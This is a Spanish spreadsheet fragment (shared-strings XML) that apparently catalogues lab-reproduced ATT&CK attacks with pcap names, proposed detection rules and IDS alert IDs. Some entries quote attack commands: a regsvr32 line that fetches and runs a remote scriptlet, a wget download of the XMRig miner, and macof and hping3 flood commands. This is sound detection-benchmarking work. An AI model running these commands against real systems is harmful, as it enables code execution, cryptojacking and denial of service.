  <si>
    <t>Manual [4] / B.30</t>
  </si>
  <si>
    <t>Manual [2] /  4.2.1.9</t>
  </si>
  <si>
    <t>La ejecución de código remoto aprovechando vulnerabilidades en el servidor FTP siempre es un ataque</t>
  </si>
  <si>
    <t>34225, 34447, 34224, 50447</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>34225, 34447, 34224,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 50447</t>
    </r>
  </si>
  <si>
    <t>34225, 34447, 34224</t>
  </si>
  <si>
    <t>2002752, 2002749, 2010732, 34225, 34447, 34224, 50447</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2010732, 34225, 34447, 34224, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50447</t>
    </r>
  </si>
  <si>
    <t>2010732, 34225, 34447, 34224</t>
  </si>
  <si>
    <t>37700, 38390, 9999, 86533</t>
  </si>
  <si>
    <t>37700, 38390, 86533</t>
  </si>
  <si>
    <t>Este ataque se detecta mediante control de aplicaciones y mediante el IPS que genera alertas consideradas como TP</t>
  </si>
  <si>
    <t>Ataque Web</t>
  </si>
  <si>
    <t>DVWA, In-house selenium framework</t>
  </si>
  <si>
    <t>T1210-Web_attack-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Manual [4] / B.36</t>
  </si>
  <si>
    <t>Un ataque web siempre es considerado como tal</t>
  </si>
  <si>
    <t>50447, 31939</t>
  </si>
  <si>
    <t>50447, 31939, 2002749, 2002752, 2012885, 2009004</t>
  </si>
  <si>
    <t>50447, 31939, 2012885, 2009004</t>
  </si>
  <si>
    <t>9999, 14984</t>
  </si>
  <si>
    <t>Data from Information Repositories</t>
  </si>
  <si>
    <t>T1213</t>
  </si>
  <si>
    <t>T1213-SQL_inyection_[3].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte una inyección SQL en la URL de acceso a una página web</t>
  </si>
  <si>
    <t>Robar informacion de la victima obteniendo el contenido guardado en una tabla SQL. Comando: SELECT * FROM tabla</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.6</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.6.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.6.5</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752, 2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752, 2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752, 2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 50447</t>
    </r>
  </si>
  <si>
    <t>System Binary Proxy Execution</t>
  </si>
  <si>
    <t>T1218</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>T1218.010</t>
  </si>
  <si>
    <t>Ejecución de COM scriptlet remoto</t>
  </si>
  <si>
    <t>Regsvr32.exe</t>
  </si>
  <si>
    <t>T1218.010-COM_Scriptlet_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un intento de aprovechamiento de la vulnerabilidad del servicio regsvr32 de Windows</t>
  </si>
  <si>
    <t>Aprovechar vulnerabilidad regsvr32.exe descargando y ejecutando scripts y librerias evadiendo controles de seguridad Windows. Comando: C:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll</t>
  </si>
  <si>
    <t>Manual [2] /  3.3.1.1</t>
  </si>
  <si>
    <t>Manual [5] / C.25</t>
  </si>
  <si>
    <t>La ejecucion de un scriptlet remoto siempre se considera como un ataque</t>
  </si>
  <si>
    <t>56112, 54699</t>
  </si>
  <si>
    <t>Remote Access Software</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>Uso de TeamViewer para establecer canal de comunicación alternativo</t>
  </si>
  <si>
    <t>TeamViewer</t>
  </si>
  <si>
    <t>T1219-RemoteAccessSoftwareLocal_[5].pcapng</t>
  </si>
  <si>
    <t>UDP</t>
  </si>
  <si>
    <t xml:space="preserve">Monitorizar tráfico de red correspondiente a softwares de acesso remoto(AnyDesk, TeamViewer...). En su defecto, Deteccion por listas negras/anomalías. </t>
  </si>
  <si>
    <t>Conexion mediante TeamViewer entre dos equipos</t>
  </si>
  <si>
    <t>Manual [5] / 4.8.3</t>
  </si>
  <si>
    <t>Manual [5] / C.7</t>
  </si>
  <si>
    <t>Manual [5] /  5.11.9</t>
  </si>
  <si>
    <t>Dependiendo de las circunstancias, el uso de un software de acceso remoto puede ser tráfico legitimo</t>
  </si>
  <si>
    <t>teamviewer-sharing -- remote-access</t>
  </si>
  <si>
    <t>T1219-RemoteAccessSoftwareNAT_[5].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el uso de la herramienta TeamViewer para obtener el control del software víctima de forma remota</t>
  </si>
  <si>
    <t>59597, 24094, 254, 24097, 24096</t>
  </si>
  <si>
    <t>59597, 254</t>
  </si>
  <si>
    <t>24096, 24097, 24094</t>
  </si>
  <si>
    <t xml:space="preserve">59597, 24094, 254, 24097, 24096, 2002752, 2002749
</t>
  </si>
  <si>
    <t xml:space="preserve">59597, 24094, 254, 24097, 24096
</t>
  </si>
  <si>
    <t xml:space="preserve">59597, 254, 2002752, 2002749
</t>
  </si>
  <si>
    <t>24096, 24094, 24097</t>
  </si>
  <si>
    <t>teamviewer-web -- remote access</t>
  </si>
  <si>
    <t>93031, 9999, 14984, 14978</t>
  </si>
  <si>
    <t>93031, 14984, 14978</t>
  </si>
  <si>
    <t>Template Injection</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>Inyectar un fichero mediante Phishing .docx con macros modificadas que permita pasar desapercibido</t>
  </si>
  <si>
    <t>Sitios web convencionales (Gmail)</t>
  </si>
  <si>
    <t>T1221-Template_Injection_[5].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte la inyección de macros o plantillas para llevar a cabo un ataque de Phishing, usando como medio mecanismos convencionales de comunicación (mensajes SMTP, por ejemplo)</t>
  </si>
  <si>
    <t>Modificación de fichero .docx para, mediante macros, provocar la descarga y ejecución de malware en el equipo víctima</t>
  </si>
  <si>
    <t>Manual [5] / 4.4.1</t>
  </si>
  <si>
    <t>Manual [5] / C.8</t>
  </si>
  <si>
    <t>Manual [5] /  5.6.5</t>
  </si>
  <si>
    <t>El tráfico puede parecer ser legítimo en una inyección de plantilalas (.DOTM)</t>
  </si>
  <si>
    <t>46979, 402, 1917</t>
  </si>
  <si>
    <t>402, 1917</t>
  </si>
  <si>
    <t>46979, 402, 1917, 2031379, 2041131, 2016141, 2035480, 2025644</t>
  </si>
  <si>
    <t>402, 1917, 2041131, 2016141, 2035480</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color theme="1"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2031379, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF57BB8A"/>
        <sz val="11.0"/>
      </rPr>
      <t>2025644</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color theme="1"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 46979</t>
    </r>
  </si>
  <si>
    <t>2031379, 2041131, 2016141, 2035480, 2025644, 50447, 46979, 402, 1917</t>
  </si>
  <si>
    <t>2041131, 2016141, 2035480, 50447, 402, 1917</t>
  </si>
  <si>
    <t>2031379, 2025644, 46979</t>
  </si>
  <si>
    <t xml:space="preserve">50447, 46979, 402, 1917, 2002752, 2002749, 2031379, 2041131, 2013491, 2013490, 2009768, 2100402, 2101917, 2016141, 2003595, 2035480, 2000419, 2025644
</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100402, 2101917</t>
  </si>
  <si>
    <t>50447, 46979, 402, 1917, 2031379, 2041131, 2013491, 2013490, 2009768, 2016141, 2003595, 2035480, 2000419, 2025644</t>
  </si>
  <si>
    <t xml:space="preserve">50447, 402, 1917, 2002752, 2002749, 2041131, 2013491, 2013490, 2009768, 2100402, 2101917, 2016141, 2003595, 2035480, 2000419
</t>
  </si>
  <si>
    <t>2002752, 2100402, 2002749</t>
  </si>
  <si>
    <t>402, 50447, 2002752, 2002749, 2013491, 2013490, 2009768, 2100402</t>
  </si>
  <si>
    <t xml:space="preserve">46979, 2031379, 2025644
</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">: la diferencia entre los flujos detectados se debe a la interpretación de flujos de Snortv3 (no hay pérdidas) y a un flujo ICMP no identificado por Snortv2 (no afecta a los resultados).                                                                    </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Instancias Colaterales</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: el ataque contiene un establecimiento previo de sesión mediante Metasploit. Tanto este ataque colateral como el principal son detectados.</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Ataques Colaterales: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>FortiGate detecta el establecimiento de la sesión con un shell remoto</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">9999, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="7"/>
        <sz val="14.0"/>
      </rPr>
      <t>33515</t>
    </r>
  </si>
  <si>
    <t>PaloAlto detecta la URL correspondiente a la plantilla .dotm descarga</t>
  </si>
  <si>
    <t>Domain Trust Discovery</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>Descubrimiento de dominios de confianza en entorno Active Directory</t>
  </si>
  <si>
    <t>dsquery</t>
  </si>
  <si>
    <t>T1482-Domain_trust_discovery_[4].pcapng</t>
  </si>
  <si>
    <t>LDAP</t>
  </si>
  <si>
    <t>Regla personalizada que detecte paquetes LDAP, procedentes de equipos que no son DC en la red (configurable manualmente) y con la cadena objectClass=trustedDomain</t>
  </si>
  <si>
    <t>Manual [4] /  3.13</t>
  </si>
  <si>
    <t>Manual [4] / B.13</t>
  </si>
  <si>
    <t>Manual [4] / 4.13</t>
  </si>
  <si>
    <t>El descubrimiento de dominios de confianza puede ser una actividad legítima</t>
  </si>
  <si>
    <t>2002752, 2002749, 44604</t>
  </si>
  <si>
    <t>Impact</t>
  </si>
  <si>
    <t>Defacement</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t>Internal Defacement</t>
  </si>
  <si>
    <t>T1491.001</t>
  </si>
  <si>
    <t>Modificar fondo de pantalla equipo victima</t>
  </si>
  <si>
    <t>T1491.001-Internal_Defacement_[5].pcapng</t>
  </si>
  <si>
    <t>Detectable por listas negras/anomalías</t>
  </si>
  <si>
    <t>Manual [5] / 4.10.1</t>
  </si>
  <si>
    <t>Manual [5] / C.9</t>
  </si>
  <si>
    <t>Manual [5] /  5.13.1</t>
  </si>
  <si>
    <t>Esta acción puede considerarse tráfico legítimo</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">1917, 2035480, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF34A853"/>
        <sz val="11.0"/>
      </rPr>
      <t>2025644</t>
    </r>
  </si>
  <si>
    <t>1917, 2035480, 2025644</t>
  </si>
  <si>
    <t>1917, 2035480</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">1917, 2035480, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF34A853"/>
        <sz val="11.0"/>
      </rPr>
      <t>2025644</t>
    </r>
  </si>
  <si>
    <t>2002752, 2002749, 2035480, 2000419, 2025644, 2101917, 1917</t>
  </si>
  <si>
    <t>2035480, 2000419, 2025644, 2101917, 1917</t>
  </si>
  <si>
    <t>2002752, 2002749, 2035480, 2000419, 2101917, 1917</t>
  </si>
  <si>
    <t>2035480, 2000419</t>
  </si>
  <si>
    <t>2002752, 2002749, 1917, 2101917</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Instancias Colaterales</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: el ataque contiene un establecimiento de conexión mediante Metasploit detectado correctamente por Snort. El ataque en sí, sin embargo, no es detectado.</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Ataques Colaterales: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>FortiGate detecta el establecimiento de la sesión con un shell remoto</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Ataque colateral: PaloAlto detecta el uso de Metasploit </t>
  </si>
  <si>
    <t>Resource Hijacking</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>Descarga y puesta en marcha de software de criptominado</t>
  </si>
  <si>
    <t>XMRIG</t>
  </si>
  <si>
    <t>T1496-Cryptomining_[2].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">Instalacion y uso de software de minado. Comando: wget </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color rgb="FF1155CC"/>
        <sz val="11.0"/>
        <u/>
      </rPr>
      <t>https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-linux-x64.tar.gz</t>
    </r>
  </si>
  <si>
    <t>Manual [2] /  3.3.2.1</t>
  </si>
  <si>
    <t>Manual [5] / C.26</t>
  </si>
  <si>
    <t>Manual [2] / 4.2.2.3</t>
  </si>
  <si>
    <t>El uso de un software de criptominado siempre se considera como un ataque</t>
  </si>
  <si>
    <t>2002752, 2002749, 254</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no analiza un flujo ICMP y otro IP. Estos flujos no son relevantes para el ataque</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">9999, 632447088
</t>
  </si>
  <si>
    <t>Network Denial of Service</t>
  </si>
  <si>
    <t>T1498</t>
  </si>
  <si>
    <t>Reflection Amplification</t>
  </si>
  <si>
    <t>T1498.002</t>
  </si>
  <si>
    <t>Amplificación DNS</t>
  </si>
  <si>
    <t>dnsdrdos</t>
  </si>
  <si>
    <t>T1498-Amplif_dns_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de respuestas DNS no solicitadas con un mismo nombre resuelto hacia la red protegida</t>
  </si>
  <si>
    <t>Manual [1] /  3.5.1</t>
  </si>
  <si>
    <t>Manual [1] / E.14</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.35 y Manual [5] / 5.13.3</t>
  </si>
  <si>
    <t>Siempre se considera como ataque la amplificacion DNS</t>
  </si>
  <si>
    <t>402, 54827</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002749, 2100402, 2002752, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100254, 2013514, 54827, 402</t>
    </r>
  </si>
  <si>
    <t>2100254, 2013514, 54827, 402</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002749, 2100402, 2002752, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100254, 2013514, 54827, 402</t>
    </r>
  </si>
  <si>
    <t>2002752, 2100402, 2002749, 402</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: la diferencia entre los flujos detectados por las versiones de Snort y los presentes en la captura se debe a la existencia de flujos ICMP  y HPEXT, pero no son relevantes para el ataque</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Ataques Colaterales: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>dentro de la captura hay un flujo DNS que usa tunelización DNS con la herramienta dnscat. Sin embargo, estos paquetes no están relacionados con el ataque en sí</t>
    </r>
  </si>
  <si>
    <t>dns-base -- infrastructure</t>
  </si>
  <si>
    <t>Una vez el ataque ha sido detectado mediante IPS, el control de Aplicaciones nos indica que la app es DNS-Base, directamente relacionado con el ataque. Por lo tanto, el resto de flujos son parte del ataque y contabilizan como detección mediante Control de Aplicaciones</t>
  </si>
  <si>
    <t>5160</t>
  </si>
  <si>
    <t>Fraggle</t>
  </si>
  <si>
    <t>T1498-Fraggle_[1].pcapng</t>
  </si>
  <si>
    <t>Chargen</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de datagramas UDP hacia un puerto concreto, con fin de saturarlo y causar su inoperatividad</t>
  </si>
  <si>
    <t>Manual [1] /  3.4.5</t>
  </si>
  <si>
    <t>Manual [1] / E.13</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.36 y Manual [5] / 5.13.3</t>
  </si>
  <si>
    <t>Una denegación de servicio siempre es un ataque</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100402, 402</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: las diferencias entre los flujos detectados son irrelevantes. En Snortv2 no se analiza un flujo ICMP y en Snortv3 se desagrupa un flujo (tranalyzer) en dos. No afectan a los resultados</t>
    </r>
  </si>
  <si>
    <t>Smurf</t>
  </si>
  <si>
    <t>T1498-Smurf_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de respuestas ICMP</t>
  </si>
  <si>
    <t>Manual [1] /  3.3.1</t>
  </si>
  <si>
    <t>Manual [1] / E.7</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.37 y Manual [5] / 5.13.3</t>
  </si>
  <si>
    <t>2100527, 2002749, 2100408, 2002752, 2101620, 408</t>
  </si>
  <si>
    <t>2002752, 2100527, 2101620, 2100408, 2002749</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: un flujo HPEXT (L2) no es analizado por ambas versiones de Snort. Dos flujos ICMP (uno de ellos con direcciones IPv6) no son analizados por Snortv2, aunque no son relevantes para el ataque.</t>
    </r>
  </si>
  <si>
    <t>Inundación de TCBPDU</t>
  </si>
  <si>
    <t>yersinia</t>
  </si>
  <si>
    <t>T1498-Tcbpdu_[1].pcapng</t>
  </si>
  <si>
    <t>STP</t>
  </si>
  <si>
    <t>Fuera del alcance del estudio</t>
  </si>
  <si>
    <t>Manual [1] /  3.2.2</t>
  </si>
  <si>
    <t>Manual [1] / E.5</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.38 y Manual [5] / 5.13.3</t>
  </si>
  <si>
    <t>Un ataque de inundación siempre se considera como tal</t>
  </si>
  <si>
    <t>Direct Network Flood</t>
  </si>
  <si>
    <t>T1498.001</t>
  </si>
  <si>
    <t>Inundación HTTP</t>
  </si>
  <si>
    <t>T1498.001-HTTP_flood-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte envío masivo de mensajes HTTP</t>
  </si>
  <si>
    <t>Manual [4] / B.37</t>
  </si>
  <si>
    <t>Manual [5] / 5.13.3</t>
  </si>
  <si>
    <t>2019348, 2002749, 2002752</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: a causa de la saturación provocada por el ataque, hay un total de 249 flujos que se han visto "podados" a causa de la falta de memoria. Estos flujos son contabilizados por Snortv3 pero no por Snortv2</t>
    </r>
  </si>
  <si>
    <t>Inundación tabla MAC</t>
  </si>
  <si>
    <t>Macof</t>
  </si>
  <si>
    <t>T1498.001-MAC_table_flood_[3].pcapng</t>
  </si>
  <si>
    <t>Inundacion tabla MAC mediante Macof. Comando: sudo macof -i enp0s9 -d 172.16.1.1</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.18</t>
  </si>
  <si>
    <t>Manual [5] / C.27</t>
  </si>
  <si>
    <t>Manual [3] / 3.18.5 y Manual [5] / 5.13.3</t>
  </si>
  <si>
    <t>2101917, 2002749, 2002752, 2100528, 1917</t>
  </si>
  <si>
    <t>2100528, 1917</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: todos los flujos son flujos IPv4 (considerados por tranalyzer y Snortv3) salvo dos flujos UDP. Estos son los flujos que detecta Snortv2. Este hecho es entendible partiendo de la premisa de que los IDS por lo general no detectan ataques basados en capas inferiores a la 3 (modelo OSI).</t>
    </r>
  </si>
  <si>
    <t>56049, 56538</t>
  </si>
  <si>
    <t>Inundación TCP</t>
  </si>
  <si>
    <t>T1498.001-TCP_flood-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte envío masivo de mensajes TCP</t>
  </si>
  <si>
    <t>2016877, 2016870, 2014153, 2050746</t>
  </si>
  <si>
    <t>2016877, 2016870, 2050746</t>
  </si>
  <si>
    <t>50447, 2016877, 2016870, 2014153, 2050746</t>
  </si>
  <si>
    <t>50447, 2016877, 2016870, 2050746</t>
  </si>
  <si>
    <t xml:space="preserve">50447, 2016877, 2016870, 2014153, 2002752, 2002749, 2003394, 2015529, 2015526, 2002828, 2002829 </t>
  </si>
  <si>
    <t xml:space="preserve">50447, 2016877, 2016870, 2014153, 2003394, 2015529, 2015526, 2002828, 2002829 </t>
  </si>
  <si>
    <t xml:space="preserve">50447, 2016877, 2016870, 2002752, 2002749, 2003394, 2015529, 2015526, 2002828, 2002829 </t>
  </si>
  <si>
    <t>9999, 14984, 34767, 40032</t>
  </si>
  <si>
    <t>14984, 34767, 40032</t>
  </si>
  <si>
    <t>34767, 9999, 40032</t>
  </si>
  <si>
    <t>Inundación UDP</t>
  </si>
  <si>
    <t xml:space="preserve">  Caldera, hping3</t>
  </si>
  <si>
    <t>T1498.001-UDP_flood_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de mensajes UDP con destino el mismo puerto objetivo</t>
  </si>
  <si>
    <t>Inundacion UDP en la red de la víctima. Comando: timeout 10s hping3 --udp --flood 192.168.2.2</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.10.2</t>
  </si>
  <si>
    <t>Manual [2]</t>
  </si>
  <si>
    <t>2100525, 2002752, 2002749, 2100402, 402</t>
  </si>
  <si>
    <t>2100525, 402</t>
  </si>
  <si>
    <t>T1498.001-UDP_flood_1-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Manual [5] / C.28</t>
  </si>
  <si>
    <t>402, 2002749, 2100402, 2002752</t>
  </si>
  <si>
    <t>2002749, 2002752, 2100402</t>
  </si>
  <si>
    <t>2002749, 2002752, 2100402, 402</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no analiza 10 flujos ICMP. Estos flujos son irrelevantes para el análisis del ataque</t>
    </r>
  </si>
  <si>
    <t>T1498.001-UDP_flood_2-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Endpoint Denial of Service</t>
  </si>
  <si>
    <t>T1499</t>
  </si>
  <si>
    <t>Service Exhaustion Flood</t>
  </si>
  <si>
    <t>T1499.002</t>
  </si>
  <si>
    <t>Inundación DHCP / Inanición</t>
  </si>
  <si>
    <t>DHCPig, yersinia</t>
  </si>
  <si>
    <t>T1499-Dhcp_flood_[1].pcapng</t>
  </si>
  <si>
    <t>DHCP</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de procedimientos DHCP completos (DISCOVERY, OFFER, REQUEST, ACK)</t>
  </si>
  <si>
    <t>Manual [1] /  2.4.2.1.1</t>
  </si>
  <si>
    <t>Manual [1] / E.18</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.39 y Manual [5] / 5.13.2</t>
  </si>
  <si>
    <t>El aagotamiento del pool de direcciones de un servidor DHCP siempre es un ataque</t>
  </si>
  <si>
    <t>46533, 2100527, 2002749, 2002752</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
